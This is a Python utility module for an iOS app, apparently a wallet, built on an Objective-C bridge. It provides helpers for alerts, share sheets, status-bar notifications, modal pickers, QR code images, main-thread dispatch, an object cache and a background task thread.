def tintify(t : ObjCInstance) -> ObjCInstance:
# setup nav tint colors
t.navigationBar.setTranslucent_(False)
t.navigationBar.barTintColor = uicolor_custom('nav')
t.navigationBar.tintColor = uicolor_custom('navtint')
t.navigationBar.barStyle = UIBarStyleBlack
return t
def ats_replace_font(ats : NSAttributedString, font: UIFont) -> NSMutableAttributedString:
out = NSMutableAttributedString.alloc().initWithAttributedString_(ats)
r = NSRange(0, out.length())
out.removeAttribute_range_(NSFontAttributeName, r)
out.addAttribute_value_range_(NSFontAttributeName, font, r)
return out
def uitf_redo_attrs(tf : ObjCInstance) -> None:
weight = UIFontWeightMedium if tf.tag == 1 else UIFontWeightRegular
# TESTING ATTRIBUTED STRING STUFF..
# 1. Placeholder
ats = NSMutableAttributedString.alloc().initWithString_(tf.placeholder).autorelease()
r = NSRange(0,ats.length())
ats.addAttribute_value_range_(NSFontAttributeName, UIFont.italicSystemFontOfSize_(14.0), r)
ats.addAttribute_value_range_(NSForegroundColorAttributeName, uicolor_custom('light'), r)
ps = NSMutableParagraphStyle.new().autorelease()
ps.setParagraphStyle_(NSParagraphStyle.defaultParagraphStyle)
ps.lineBreakMode = NSLineBreakByTruncatingMiddle
indent = 10.0 if tf.isUserInteractionEnabled() else 0.0
ps.firstLineHeadIndent = indent
ps.tailIndent = -indent
ats.addAttribute_value_range_(NSParagraphStyleAttributeName, ps, r)
tf.attributedPlaceholder = ats
# 2. Actual text
ats = NSMutableAttributedString.alloc().initWithString_(tf.text)
r = NSRange(0,ats.length())
ats.addAttribute_value_range_(NSFontAttributeName, UIFont.systemFontOfSize_weight_(14.0, weight), r)
ats.addAttribute_value_range_(NSForegroundColorAttributeName, uicolor_custom('dark'), r)
ats.addAttribute_value_range_(NSParagraphStyleAttributeName, ps, r)
tf.attributedText = ats
# NB: This isn't normally called directly, since you need to specify the full pathname of the resource you want;
# instead, if you need images, call uiimage_get, etc. This does NOT search recursively, since NSBundle sucks.
def get_bundle_resource_path(fileName: str, directory: str = None) -> str:
fn,ext = get_fn_and_ext(fileName)
if directory is None:
return NSBundle.mainBundle.pathForResource_ofType_(fn, ext)
return NSBundle.mainBundle.pathForResource_ofType_inDirectory_(fn, ext, directory)
def nsattributedstring_from_html(html : str) -> ObjCInstance:
data = ns_from_py(html.encode('utf-8'))
return NSMutableAttributedString.alloc().initWithHTML_documentAttributes_(data,None).autorelease()
def uilabel_replace_attributed_text(lbl : ObjCInstance, text : str, template : ObjCInstance = None, font : ObjCInstance = None) -> ObjCInstance:
if not isinstance(template, NSAttributedString):
template = lbl.attributedText
if template is None:
            template = NSAttributedString.new().autorelease()
astr = NSMutableAttributedString.alloc().initWithAttributedString_(template).autorelease()
astr.replaceCharactersInRange_withString_(NSRange(0,astr.length()), text)
if font:
r = NSRange(0,astr.length())
astr.removeAttribute_range_(NSFontAttributeName,r)
astr.addAttribute_value_range_(NSFontAttributeName,font,r)
lbl.attributedText = astr
return lbl
def nsurl_read_local_file(url : ObjCInstance, binary = False) -> tuple:
try:
cstring = NSMutableData.dataWithLength_(4096)
from ctypes import c_char_p
url.getFileSystemRepresentation_maxLength_(c_char_p(cstring.mutableBytes), 4096)
filename = py_from_ns(cstring)
nul = filename.find(b'\0')
if nul >= 0:
filename = filename[:nul]
filename = filename.decode('utf-8')
mode = "r"
if binary: mode = "rb"
with open(filename, mode) as f:
data = f.read()
#print("File data:\n",data)
return data, filename
except:
NSLog("nsurl_read_local_file got exception: %s",str(sys.exc_info[1]))
return None, None
_threading_original__init__ = None
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
global _threading_original__init__
if _threading_original__init__:
NSLog("*** ERROR: setup_thread_excepthook already called once in this app!")
return
_threading_original__init__ = threading.Thread.__init__
def MyInit(self, *args, **kwargs):
_threading_original__init__(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except ConnectionError:
NSLog("ConnectionError: %s",str(sys.exc_info()[1]))
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = MyInit
def cleanup_thread_excepthook():
global _threading_original__init__
if _threading_original__init__:
threading.Thread.__init__ = _threading_original__init__
_threading_original__init__ = None
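# --- Hedged usage sketch (illustration only) ---------------------------------
# Call setup_thread_excepthook() once from the main thread at app startup,
# before any Thread is created; uncaught exceptions in worker threads then
# reach sys.excepthook instead of being silently swallowed:
#
#   setup_thread_excepthook()
#   threading.Thread(target=function_that_may_raise, daemon=True).start()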
###################################################
### Show Share ActionSheet
###################################################
def show_share_actions(vc : ObjCInstance,
fileName : str = None,
text : str = None,
url : NSURL = None,
img : UIImage = None,
excludedActivityTypes = None,
completion: Callable[[],None] = None, # optional completion function that gets called when alert is presented
ipadAnchor : object = None,
animated : bool = True,
finishedCompletion: Callable[[], str] = None, # optional completion function that gets called when alert is finished. the string passed is the UIActivityType the user selected, or None if the user cancelled the activity
objectName : str = None # the descriptive name of the object eg 'File' or 'Transaction' or 'Wallet', translated
) -> ObjCInstance:
objectName = _("File") if not objectName or not isinstance(objectName, str) else objectName
items = []
if fileName:
items.append(NSURL.fileURLWithPath_(fileName))
if isinstance(text, str):
items.append(ns_from_py(text))
if isinstance(url, NSURL):
items.append(url)
if isinstance(img, UIImage):
items.append(img)
avc = UIActivityViewController.alloc().initWithActivityItems_applicationActivities_(items, None).autorelease()
if excludedActivityTypes is None:
excludedActivityTypes = [
UIActivityTypePostToFacebook,
UIActivityTypePostToTwitter,
UIActivityTypePostToWeibo,
UIActivityTypeAssignToContact,
UIActivityTypeSaveToCameraRoll,
UIActivityTypeAddToReadingList,
UIActivityTypePostToFlickr,
UIActivityTypePostToVimeo,
UIActivityTypePostToTencentWeibo,
UIActivityTypeOpenInIBooks,
]
if isinstance(img, UIImage):
excludedActivityTypes.remove(UIActivityTypeSaveToCameraRoll)
avc.excludedActivityTypes = excludedActivityTypes
if is_ipad():
popover = avc.popoverPresentationController()
if isinstance(ipadAnchor, UIBarButtonItem):
popover.barButtonItem = ipadAnchor
else:
popover.sourceView = vc.view
if isinstance(ipadAnchor, CGRect):
rect = ipadAnchor
else:
rect = vc.view.frame
rect = CGRectMake(rect.size.width/2.0,rect.size.height/4.0,0.0,0.0)
popover.sourceRect = rect
def onCompletion() -> None:
if completion is not None:
#print("Calling completion callback..")
completion()
def ActivityCompletion(s : objc_id, completed : bool, arr : objc_id, err : objc_id) -> None:
activity = py_from_ns(ObjCInstance(s)) if completed else None
def DoUserCompl() -> None:
if callable(finishedCompletion):
finishedCompletion(activity)
print('activity =',activity)
if err and err.value:
err = ObjCInstance(err)
show_alert(vc = vc, title = "Error", message = str(err), actions = [ [_('OK'), DoUserCompl] ])
else:
DoUserCompl()
if activity is None: return
        if activity in (py_from_ns(UIActivityTypeCopyToPasteboard),):
show_notification(message = _("{} copied to clipboard").format(objectName))
elif activity in ('com.apple.CloudDocsUI.AddToiCloudDrive', py_from_ns(UIActivityTypeAirDrop)):
show_notification(message = _("{} saved successfully").format(objectName))
elif activity in (py_from_ns(UIActivityTypeMessage),py_from_ns(UIActivityTypeMail)):
show_notification(message = _("{} sent successfully").format(objectName))
        elif activity in (py_from_ns(UIActivityTypePrint),):
show_notification(message = _("{} sent to printer").format(objectName))
        elif activity in (py_from_ns(UIActivityTypeSaveToCameraRoll),):
show_notification(message = _("{} saved to photo library").format(objectName))
else:
show_notification(message = _("{} exported successfully").format(objectName))
avc.completionWithItemsHandler = Block(ActivityCompletion)
vc.presentViewController_animated_completion_(avc,animated,onCompletion)
return avc
###################################################
### Show modal alert
###################################################
def show_please_wait(vc : ObjCInstance, message : str, animated : bool = True, completion : Callable[[],None] = None) -> ObjCInstance:
pw = None
try:
objs = NSBundle.mainBundle.loadNibNamed_owner_options_("PleaseWait", None, None)
for o in objs:
if isinstance(o, PleaseWaitVC):
pw = o
break
except:
NSLog("Could not load PleaseWait.nib:",sys.exc_info()[1])
if not pw:
return show_alert(vc, title = _("Please wait"), message = message, actions = [], animated = animated, completion = completion)
pw.message.text = message
vc.presentViewController_animated_completion_(pw, animated, completion)
return pw
def show_alert(vc : ObjCInstance, # the viewcontroller to present the alert view in
title : str, # the alert title
message : str, # the alert message
# actions is a list of lists: each element has: Button names, plus optional callback spec
# each element of list is [ 'ActionTitle', callable, arg1, arg2... ] for optional callbacks
actions: list = [ ['Ok'] ], # default has no callbacks and shows Ok button
cancel: str = None, # name of the button you want to designate as 'Cancel' (ends up being first)
destructive: str = None, # name of the button you want to designate as destructive (ends up being red)
style: int = UIAlertControllerStyleAlert, #or: UIAlertControllerStyleActionSheet
completion: Callable[[],None] = None, # optional completion function that gets called when alert is presented
animated: bool = True, # whether or not to animate the alert
localRunLoop: bool = False, # whether or not to create a local event loop and block until dialog finishes.. useful for full stop error messages and/or password dialogs
               uiTextFieldHandlers : list = None, # if you want to create custom UITextFields in this alert, and the alert's style is UIAlertControllerStyleAlert, pass a list of fully annotated callbacks taking an objc_id as arg and returning None, one for each desired text field you want to create
ipadAnchor : object = None # A CGRect -- use this on ipad to specify an anchor if using UIAlertControllerStyleActionSheet
) -> ObjCInstance:
if localRunLoop:
NSLog("\n***\n*** WARNING -- 'localRunLoop' on modal dialogs is pretty buggy, as it turns out. Please fix the calling code to not use it!\n***")
if not NSThread.currentThread.isMainThread:
raise Exception('utils.show_alert can only be called from the main thread!')
alert = UIAlertController.alertControllerWithTitle_message_preferredStyle_(title, message, style)
if uiTextFieldHandlers:
if style != UIAlertControllerStyleAlert:
raise ValueError('Cannot combine uiTextFieldHandlers with non-UIAlertControllerStyleAlert alerts!')
for h in uiTextFieldHandlers:
alert.addTextFieldWithConfigurationHandler_(Block(h)) # let's hope h is a callable of the right type with the right number of args else exception will be thrown here
if type(actions) is dict:
acts = []
for k in actions.keys():
if actions[k] is not None:
acts.append([k,*actions[k]])
else:
                acts.append([k])
actions = acts
ct=0
fun_args_dict = dict()
got_callback = False
for i,arr in enumerate(actions):
has_callable = False
fun_args = []
if type(arr) is list or type(arr) is tuple:
actTit = arr[0]
fun_args = arr[1:]
has_callable = True
else:
actTit = arr
style = UIAlertActionStyleCancel if actTit == cancel else UIAlertActionStyleDefault
style = UIAlertActionStyleDestructive if actTit == destructive else style
def onAction(act_in : objc_id) -> None:
act = ObjCInstance(act_in)
fargs = fun_args_dict.get(act.ptr.value,[])
nonlocal got_callback
got_callback = True
if len(fargs):
#print("Calling action...")
fargs[0](*fargs[1:])
act = UIAlertAction.actionWithTitle_style_handler_(actTit,style,onAction)
fun_args_dict[act.ptr.value] = fun_args
alert.addAction_(act)
ct+=1
def onCompletion() -> None:
#print("On completion called..")
nonlocal got_callback, alert
if not actions: got_callback = True
if completion is not None:
#print("Calling completion callback..")
sig = signature(completion)
if len(sig.parameters) > 0:
completion(alert.ptr)
else:
completion()
if is_ipad() and alert.preferredStyle == UIAlertControllerStyleActionSheet:
popover = alert.popoverPresentationController()
if isinstance(ipadAnchor, UIBarButtonItem):
popover.barButtonItem = ipadAnchor
else:
popover.sourceView = vc.view
if isinstance(ipadAnchor, CGRect):
rect = ipadAnchor
else:
rect = vc.view.frame
rect = CGRectMake(rect.size.width/2.0,rect.size.height/4.0,0.0,0.0)
popover.sourceRect = rect
vc.presentViewController_animated_completion_(alert,animated,onCompletion)
if localRunLoop:
while not got_callback:
NSRunLoop.currentRunLoop().runUntilDate_(NSDate.dateWithTimeIntervalSinceNow_(0.1))
return None
return alert
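# --- Hedged usage sketch (illustration only; `some_vc` is a hypothetical presenting
# view controller) -------------------------------------------------------------
# 'actions' is a list of [title, callback, *callback_args] entries; 'cancel' and
# 'destructive' pick which titles get the corresponding button styles:
#
#   def _delete_tapped() -> None:
#       print("delete confirmed")
#   show_alert(vc = some_vc, title = _("Delete?"), message = _("This cannot be undone."),
#              actions = [ [_('Delete'), _delete_tapped], [_('Cancel')] ],
#              cancel = _('Cancel'), destructive = _('Delete'))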
# Useful for doing a "Please wait..." style screen that takes itself offscreen automatically after a delay
# (may end up using this for some info alerts.. not sure yet)
def show_timed_alert(vc : ObjCInstance, title : str, message : str,
timeout : float, style : int = UIAlertControllerStyleAlert, animated : bool = True) -> ObjCInstance:
assert NSThread.currentThread.isMainThread
alert = None
def completionFunc() -> None:
def dismisser() -> None:
vc.dismissViewControllerAnimated_completion_(animated,None)
call_later(timeout, dismisser)
alert=show_alert(vc=vc, title=title, message=message, actions=[], style=style, completion=completionFunc)
return alert
# Useful for showing an alert with a single UITextField for user input of data
def show_tf_alert(vc : ObjCInstance, title : str, message : str,
completion : Callable[[],None] = None, placeholder : str = "Tap to input", text : str = "",
adjustsFontSizeToFitWidth = True, minimumFontSize = 9.0, clearButtonAlwaysVisible = True,
onOk : Callable[[],str] = None, onCancel : Callable[[],None] = None, animated : bool = True,
secureTextEntry = False, autocapitalizationType = UITextAutocapitalizationTypeNone,
autocorrectionType = UITextAutocorrectionTypeNo, spellCheckingType = UITextSpellCheckingTypeNo) -> ObjCInstance:
tf = None
def SetupTF(tfo : objc_id) -> None:
nonlocal tf
tf = ObjCInstance(tfo).retain() # need to retain it because it will get released when dialog goes away, but we want its data in MyOnOk below..
tf.placeholder = placeholder if placeholder else ''
tf.adjustsFontSizeToFitWidth = adjustsFontSizeToFitWidth
tf.minimumFontSize = minimumFontSize
tf.clearButtonMode = UITextFieldViewModeAlways if clearButtonAlwaysVisible else UITextFieldViewModeWhileEditing
tf.secureTextEntry = secureTextEntry
tf.autocapitalizationType = autocapitalizationType
tf.autocorrectionType = autocorrectionType
tf.spellCheckingType = spellCheckingType
tf.text = text if text else ''
def MyOnCancel() -> None:
nonlocal tf
tf.release()
tf = None
if callable(onCancel):
onCancel()
def MyOnOk() -> None:
nonlocal tf
userInput = tf.text
tf.release()
tf = None
if callable(onOk):
onOk(userInput)
return show_alert(vc = vc, title = title, message = message, completion = completion, cancel = _('Cancel'), animated = animated,
uiTextFieldHandlers = [ SetupTF ], actions = [ [ _('OK'), MyOnOk ], [ _('Cancel'), MyOnCancel ] ])
###################################################
### Calling callables later or from the main thread
###################################################
def do_in_main_thread(func : Callable, *args) -> Any:
if NSThread.currentThread.isMainThread:
return func(*args)
else:
def VoidFun() -> None:
func(*args)
HelpfulGlue.performBlockInMainThread_sync_(VoidFun, False)
return None
def do_in_main_thread_sync(func : Callable, *args) -> Any:
if NSThread.currentThread.isMainThread:
return func(*args)
else:
def VoidFun() -> None:
func(*args)
HelpfulGlue.performBlockInMainThread_sync_(VoidFun, True)
return None
def do_in_main_thread_async(func : Callable, *args) -> None:
def VoidFun() -> None:
func(*args)
HelpfulGlue.performBlockInMainThread_sync_(VoidFun, False)
def call_later(timeout : float, func : Callable, *args) -> ObjCInstance:
timer = None
if not NSThread.currentThread.isMainThread:
# NB: From NSRunLoop docs -- messing with the run loop from another thread is bad bad bad since NSRunLoop is not thread safe
        # so we force this scheduling of the NSTimer to happen on the main thread... using dispatch_queue tricks in HelpfulGlue.
#NSLog("****** WARNING WARNING WARNING -- utils.call_later() called from outside the main thread! FIXME!!!! ******")
def inMain() -> None:
nonlocal timer
timer = call_later(timeout, func, *args)
HelpfulGlue.performBlockInMainThread_sync_(inMain, True)
else:
def OnTimer(t_in : objc_id) -> None:
t = ObjCInstance(t_in)
func(*args)
if t: t.invalidate()
timer = NSTimer.timerWithTimeInterval_repeats_block_(timeout, False, OnTimer)
NSRunLoop.mainRunLoop().addTimer_forMode_(timer, NSDefaultRunLoopMode)
return timer
###
### Modal picker stuff
###
class UTILSModalPickerHelper(UIViewController):
''' This class has this funny name because in the obj-c space, all class names are in the global namespace
and as this class really is a private class to utils.py, we name it using the UTILS prefix to keep things
isolated. '''
items = objc_property()
lastSelection = objc_property()
needsDismiss = objc_property()
@objc_method
def init(self) -> ObjCInstance:
self = ObjCInstance(send_super(__class__, self,'init'))
if self:
self.items = None
self.lastSelection = 0
self.needsDismiss = False
self.modalPresentationStyle = UIModalPresentationOverFullScreen
return self
@objc_method
def dealloc(self) -> None:
self.finished()
remove_all_callbacks(self)
self.needsDismiss = None
# print("UTILSModalPickerHelper dealloc")
send_super(__class__, self, 'dealloc')
@objc_method
def numberOfComponentsInPickerView_(self, p : ObjCInstance) -> int:
return 1
@objc_method
def pickerView_numberOfRowsInComponent_(self, p : ObjCInstance, component : int) -> int:
assert component == 0
return len(self.items)
@objc_method
def pickerView_didSelectRow_inComponent_(self, p : ObjCInstance, row : int, component : int) -> None:
assert component == 0 and row < len(self.items)
self.lastSelection = row
@objc_method
def pickerView_titleForRow_forComponent_(self, p : ObjCInstance, row : int, component : int) -> ObjCInstance:
txt = ''
if component == 0 and row < len(self.items): txt = self.items[row]
return txt
@objc_method
def onOk_(self, but : ObjCInstance) -> None:
# print ("Ok pushed")
cb = get_callback(self, 'onOk')
if callable(cb):
sig = signature(cb)
params = sig.parameters
if len(params) > 0:
cb(int(self.lastSelection if self.lastSelection else 0))
else:
cb()
self.finished()
@objc_method
def onCancel_(self, but : ObjCInstance) -> None:
# print ("Cancel pushed")
self.finished()
@objc_method
def finished(self) -> None:
if self.viewIfLoaded and self.needsDismiss:
self.dismissViewControllerAnimated_completion_(True, None)
self.items = None
self.lastSelection = None
self.needsDismiss = False
###################################################
### Modal picker
###################################################
def present_modal_picker(parentVC : ObjCInstance,
items : list,
selectedIndex : int = 0,
okCallback : Callable[[int],None] = None,
okButtonTitle : str = "OK",
cancelButtonTitle : str = "Cancel") -> ObjCInstance:
assert parentVC is not None and items is not None and len(items)
helper = UTILSModalPickerHelper.new().autorelease()
objs = NSBundle.mainBundle.loadNibNamed_owner_options_("ModalPickerView",helper,None)
if not objs: raise Exception("Could not load ModalPickerView nib!")
mpv = helper.view # auto-attached by NIB loader above because connection was made in NIB to file's owner.view
p = mpv.viewWithTag_(200) # note UIPickerView p is auto-connected to helper as dataSource and delegate by NIB
okBut = mpv.viewWithTag_(1)
cancelBut = mpv.viewWithTag_(2)
cancelBut.layer.borderColor = uicolor_custom('nav').CGColor
helper.items = items
if okButtonTitle is not None: okBut.setTitle_forState_(okButtonTitle, UIControlStateNormal)
if cancelButtonTitle is not None: cancelBut.setTitle_forState_(cancelButtonTitle, UIControlStateNormal)
if okBut and cancelBut:
okBut.addTarget_action_forControlEvents_(helper, SEL(b'onOk:'), UIControlEventPrimaryActionTriggered)
cancelBut.addTarget_action_forControlEvents_(helper, SEL(b'onCancel:'), UIControlEventPrimaryActionTriggered)
else:
raise Exception('Picker NIB loaded but could not find the OK or Cancel button views! FIXME!')
if callable(okCallback): add_callback(helper, 'onOk', okCallback)
if selectedIndex > 0 and selectedIndex < len(items):
p.selectRow_inComponent_animated_(selectedIndex, 0, False)
helper.lastSelection = selectedIndex
parentVC.view.endEditing_(True) # NB: do not use setDisablesAutomaticKeyboardDismissal because it is missing on newer iOS! (caused an app crash) -- so we do this instead
parentVC.presentViewController_animated_completion_(helper, True, None)
helper.needsDismiss = True
return helper
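# --- Hedged usage sketch (illustration only; `some_vc` is a hypothetical presenting
# view controller) -------------------------------------------------------------
#
#   def on_picked(index : int) -> None:
#       print("picked row", index)
#   present_modal_picker(parentVC = some_vc,
#                        items = [_("Low"), _("Medium"), _("High")],
#                        selectedIndex = 1, okCallback = on_picked)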
###################################################
### Banner (status bar) notifications
###################################################
def show_notification(message : str,
                      duration : float = 2.0, # duration in seconds; may be None, but then a completion must be specified
color : tuple = None, # color needs to have r,g,b,a components -- length 4, or be a UIColor
textColor : tuple = None, # color needs to have r,g,b,a components or be a UIColor
font : ObjCInstance = None,
style : int = CWNotificationStyleStatusBarNotification,
animationStyle : int = CWNotificationAnimationStyleTop,
animationType : int = CWNotificationAnimationTypeReplace,
animationDuration : float = 0.25, # the amount of time to animate in and out the notif
onTapCallback : Callable[[],None] = None, # the function to call if user taps notification -- should return None and take no args
multiline : bool = False,
noTapDismiss : bool = False,
completion : callable = None, # if you want to use the completion handler, set duration to None
) -> ObjCInstance:
cw_notif = CWStatusBarNotification.new().autorelease()
def onTap() -> None:
#print("onTap")
if onTapCallback is not None: onTapCallback()
if not cw_notif.notificationIsDismissing and not noTapDismiss:
cw_notif.dismissNotification()
if isinstance(color, UIColor):
pass
elif color is None or not isinstance(color, (tuple, list)) or len(color) != 4 or [c for c in color if type(c) not in [float,int] ]:
color = uicolor_custom('notif')
else:
color = UIColor.colorWithRed_green_blue_alpha_(*color)
if isinstance(textColor, UIColor):
pass
elif textColor is None or not isinstance(textColor, (tuple, list)) or len(textColor) != 4 or [c for c in textColor if type(c) not in [float,int] ]:
textColor = uicolor_custom('dark')
else:
textColor = UIColor.colorWithRed_green_blue_alpha_(*textColor)
if not isinstance(font, UIFont):
font = UIFont.systemFontOfSize_weight_(12, UIFontWeightMedium)
# set default blue color (since iOS 7.1, default window tintColor is black)
cw_notif.notificationLabelBackgroundColor = color
cw_notif.notificationLabelTextColor = textColor
cw_notif.notificationLabelFont = font
cw_notif.notificationStyle = style
cw_notif.notificationAnimationInStyle = animationStyle
cw_notif.notificationAnimationOutStyle = animationStyle
cw_notif.notificationAnimationType = animationType
cw_notif.notificationAnimationDuration = animationDuration
cw_notif.multiline = multiline
message = str(message)
duration = float(duration) if duration is not None else None
cw_notif.notificationTappedBlock = onTap
if duration is None and completion is not None:
cw_notif.displayNotificationWithMessage_completion_(message, Block(completion))
else:
if duration is None: duration = 2.0
cw_notif.displayNotificationWithMessage_forDuration_(message, duration)
return cw_notif
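# --- Hedged usage sketch (illustration only) ----------------------------------
# A minimal banner with defaults, and one with a custom color and tap handler:
#
#   show_notification(message = _("Payment received"))
#   show_notification(message = _("Tap for details"), duration = 3.0,
#                     color = (0.2, 0.8, 0.2, 1.0),
#                     onTapCallback = lambda: print("notification tapped"))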
def dismiss_notification(cw_notif : ObjCInstance) -> None:
if cw_notif is not None and not cw_notif.notificationIsDismissing:
cw_notif.dismissNotification()
#######################################################
### NSLog emulation -- python wrapper for NSLog
#######################################################
def NSLog(fmt : str, *args) -> None:
args = list(args)
if isinstance(fmt, ObjCInstance):
fmt = str(py_from_ns(fmt))
fmt = fmt.replace("%@","%s")
for i,a in enumerate(args):
if isinstance(a, ObjCInstance):
try:
args[i] = str(a.description)
except Exception as e0:
#print("Exception on description call: %s"%str(e0))
try:
args[i] = str(py_from_ns(a))
except Exception as e:
print("Cannot convert NSLog argument %d to str: %s"%(i+1,str(e)))
args[i] = "<Unknown>"
try:
formatted = ns_from_py("{}".format(fmt%tuple(args)))
# NB: we had problems with ctypes and variadic functions due to ARM64 ABI weirdness. So we do this.
HelpfulGlue.NSLogString_(formatted)
except Exception as e:
print("<NSLog Emul Exception> : %s"%(str(e)))
formatted = "[NSLog Unavailable] {}".format(fmt%tuple(args))
print(formatted)
####################################################################
# NS Object Cache
#
# Store frequently used objc instances in a semi-intelligent, auto-
# retaining dictionary, complete with automatic low-memory-warning
# detection.
####################################################################
class NSObjCache:
def __init__(self, maxSize : int = 4, name : str = "Unnamed"):
self._cache = dict()
maxSize = 4 if type(maxSize) not in [float, int] or maxSize < 1 else int(maxSize) # C-programmer paranoia. ;)
self._max = maxSize
self._name = name
self._last = None
        def lowMemory(notification : ObjCInstance) -> None:
# low memory warning -- loop through cache and release all cached images
ct = 0
for k in self._cache.keys():
self._cache[k].release()
ct += 1
self._cache = dict()
self._last = None
if ct: NSLog("Low Memory: Flushed %d objects from '%s' NSObjCache."%(ct,self._name))
self._token = NSNotificationCenter.defaultCenter.addObserverForName_object_queue_usingBlock_(
UIApplicationDidReceiveMemoryWarningNotification,
UIApplication.sharedApplication,
None,
lowMemory
).retain()
def __del__(self):
while len(self): self.release1()
if self._token is not None:
NSNotificationCenter.defaultCenter.removeObserver_(self._token.autorelease())
self._token = None
def release1(self):
keez = list(self._cache.keys())
while len(keez): # this normally only iterates once
k = keez[random.randrange(len(keez))]
if len(keez) > 1 and k is not None and self._last is not None and k == self._last:
# never expire the 'latest' item from the cache, unless the cache is of size 1
continue
self._cache.pop(k).release()
if k == self._last: self._last = None
break # end after 1 successful iteration
def put(self, key, obj : ObjCInstance):
if self._cache.get(key,None) is not None: return
while len(self) >= self._max:
self.release1()
#print("NSObjCache %s expired an object from full cache"%(self._name))
self._cache[key] = obj.retain()
#print("Cache %s size now %d"%(self._name,len(self)))
def get(self, key) -> ObjCInstance: # returns None on cache miss
ret = self._cache.get(key, None)
#if ret is not None: print("NSObjCache %s hit"%(self._name))
#else: print("NSObjCache %s miss"%(self._name))
self._last = key
return ret
def __len__(self):
return len(self._cache)
#############################
# Shows a QRCode
#############################
_qr_cache = NSObjCache(10,"QR UIImage Cache")
def present_qrcode_vc_for_data(vc : ObjCInstance, data : str, title : str = "QR Code") -> ObjCInstance:
uiimage = get_qrcode_image_for_data(data)
qvc = UIViewController.new().autorelease()
qvc.title = title
iv = UIImageView.alloc().initWithImage_(uiimage).autorelease()
    iv.autoresizingMask = UIViewAutoresizingFlexibleWidth|UIViewAutoresizingFlexibleHeight|UIViewAutoresizingFlexibleLeftMargin|UIViewAutoresizingFlexibleRightMargin|UIViewAutoresizingFlexibleTopMargin|UIViewAutoresizingFlexibleBottomMargin
iv.contentMode = UIViewContentModeScaleAspectFit
iv.opaque = True
iv.backgroundColor = UIColor.whiteColor
gr = UITapGestureRecognizer.new().autorelease()
iv.addGestureRecognizer_(gr)
def ActionBlock(gr : objc_id) -> None:
def ShowIt() -> None: show_share_actions(vc = qvc, img = iv.image, ipadAnchor = iv.frame, objectName = _("Image"))
c1 = UIColor.whiteColor
c2 = UIColor.colorWithRed_green_blue_alpha_(0.0,0.0,0.0,0.3)
iv.backgroundColorAnimationFromColor_toColor_duration_reverses_completion_(c1, c2, 0.2, True, ShowIt)
gr.addBlock_(ActionBlock)
iv.userInteractionEnabled = True
qvc.view = iv
nav = tintify(UINavigationController.alloc().initWithRootViewController_(qvc).autorelease())
vc.presentViewController_animated_completion_(nav,True,None)
return qvc
def get_qrcode_image_for_data(data : str, size : CGSize = None) -> ObjCInstance:
global _qr_cache
if not isinstance(data, (str, bytes)):
        raise TypeError('argument to get_qrcode_image_for_data should be of type str or bytes!')
if isinstance(data, bytes): data = data.decode('utf-8')
uiimage = None
if not size: size = CGSizeMake(256.0,256.0)
key = "(%0.2f,%0.2f)[%s]"%(size.width,size.height,data)
uiimage = _qr_cache.get(key)
if uiimage is None:
#print("**** CACHE MISS for",key)
qr = qrcode.QRCode(image_factory=qrcode.image.svg.SvgPathFillImage)
qr.add_data(data)
img = qr.make_image()
fname = ""
tmp, fname = tempfile.mkstemp()
img.save(fname)
os.close(tmp)
with open(fname, 'r') as tmp_file:
contents = tmp_file.read()
os.remove(fname)
uiimage = UIImage.imageWithSVGString_targetSize_fillColor_cachedName_(
contents,
size,
UIColor.blackColor,
None
)
_qr_cache.put(key, uiimage)
#else:
# print("**** CACHE HIT for",key)
return uiimage
#########################################################################################
# Poor man's signal/slot support
# For our limited ObjC objects which can't have Python attributes
#########################################################################################
_cb_map = dict()
def add_callback(obj : ObjCInstance, name : str, callback : Callable) -> None:
global _cb_map
if name is None: raise ValueError("add_callback: name parameter must be not None")
if callable(callback):
m = _cb_map.get(obj.ptr.value, dict())
m[name] = callback
_cb_map[obj.ptr.value] = m
else:
remove_callback(obj, name)
def remove_all_callbacks(obj : ObjCInstance) -> None:
global _cb_map
_cb_map.pop(obj.ptr.value, None)
def remove_callback(obj : ObjCInstance, name : str) -> None:
global _cb_map
if name is not None:
m = _cb_map.get(obj.ptr.value, None)
if m is None: return
m.pop(name, None)
if len(m) <= 0:
_cb_map.pop(obj.ptr.value, None)
else:
_cb_map[obj.ptr.value] = m
else:
remove_all_callbacks(obj)
def get_callback(obj : ObjCInstance, name : str) -> Callable:
global _cb_map
def dummyCB(*args) -> None:
pass
if name is None: raise ValueError("get_callback: name parameter must be not None")
return _cb_map.get(obj.ptr.value, dict()).get(name, dummyCB)
#########################################################
# TaskThread Stuff
# -- execute a python task in a separate (Python) Thread
#########################################################
class TaskThread:
'''Thread that runs background tasks. Callbacks are guaranteed
to happen in the main thread.'''
Task = namedtuple("Task", "task cb_success cb_done cb_error")
def __init__(self, on_error=None):
self.on_error = on_error
self.tasks = queue.Queue()
self.worker = threading.Thread(target=self.run, name="TaskThread worker", daemon=True)
self.start()
def __del__(self):
#NSLog("TaskThread __del__")
if self.worker:
if self.worker.is_alive():
NSLog("TaskThread worker was running, force cancel...")
self.stop()
#self.wait()
self.worker = None
def start(self):
if self.worker and not self.worker.is_alive():
self.worker.start()
return True
elif not self.worker:
raise ValueError("The Thread worker was None!")
def add(self, task, on_success=None, on_done=None, on_error=None):
on_error = on_error or self.on_error
self.tasks.put(TaskThread.Task(task, on_success, on_done, on_error))
def run(self):
while True:
task = self.tasks.get()
if not task:
break
try:
result = task.task()
do_in_main_thread(self.on_done, result, task.cb_done, task.cb_success)
except:
do_in_main_thread(self.on_done, sys.exc_info(), task.cb_done, task.cb_error)
NSLog("Exiting TaskThread worker thread...")
def on_done(self, result, cb_done, cb):
# This runs in the main thread.
if cb_done:
cb_done()
if cb:
cb(result)
def stop(self):
if self.worker and self.worker.is_alive():
self.tasks.put(None)
def wait(self):
if self.worker and self.worker.is_alive():
self.worker.join()
self.worker = None
@staticmethod
def test():
def onError(result):
NSLog("onError called, result=%s",str(result))
tt = TaskThread(onError)
def onDone():
nonlocal tt
NSLog("onDone called")
tt.stop()
tt.wait()
NSLog("test TaskThread joined ... returning.. hopefully cleanup will happen")
tt = None # cleanup?
def onSuccess(result):
NSLog("onSuccess called, result=%s",str(result))
def task():
NSLog("In task thread.. sleeping once every second for 10 seconds")
for i in range(0,10):
NSLog("Iter: %d",i)
time.sleep(0.2)
return "Yay!"
tt.add(task, onSuccess, onDone, onError)
